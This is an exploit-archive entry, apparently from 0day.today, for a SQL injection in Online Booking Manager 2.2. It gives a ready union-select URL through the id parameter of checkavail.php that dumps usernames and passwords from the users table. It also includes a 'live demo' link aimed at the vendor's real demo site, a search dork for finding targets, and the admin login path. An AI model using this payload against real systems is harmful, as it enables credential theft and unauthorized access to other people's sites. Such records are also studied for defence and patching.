id: 3319
date: 06/27/2008
title: Online Booking Manager 2.2 (id) SQL Injection Vulnerability
author: Hussin X
cves: 

===========================================================
Online Booking Manager 2.2 (id) SQL Injection Vulnerability
===========================================================



#########################################################
#
#    Online Booking Manager2.2 (id=) SQL Injection Vulnerability
#
#########################################################
#
#    Author: Hussin X
#
#                     IRAQI
#
##########################################################
#    HomE script : http://www.onlinebookingmanager.com
#                
#           demo : http://demo.onlinebookingmanager.com/guestside/
#     
##########################################################
#
#    DorK : Online Booking Manager2.2
#
##########################################################

Exploit:   


http://www.site.com/obmp22/checkavail.php?ln=en&id=-1+union+select+concat_ws(0x3a,UserName,UserPassword)+from+users--




L!VE DEMO:


http://demo.onlinebookingmanager.com/adminside/hotel/obm2.2/checkavail.php?ln=en&id=-1+union+select+concat_ws(0x3a,UserName,UserPassword)+from+users--




Login AdmiN :



/adminside/systemadmin/


####################################( Greetz )##################################
#                                                                              #
#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      
#                          Silic0n/ FAHD / Iraqihack                           #      
#                                                                              #
#################################(and All IRAQIs)###############################



#  0day.today [2023-03-24]  #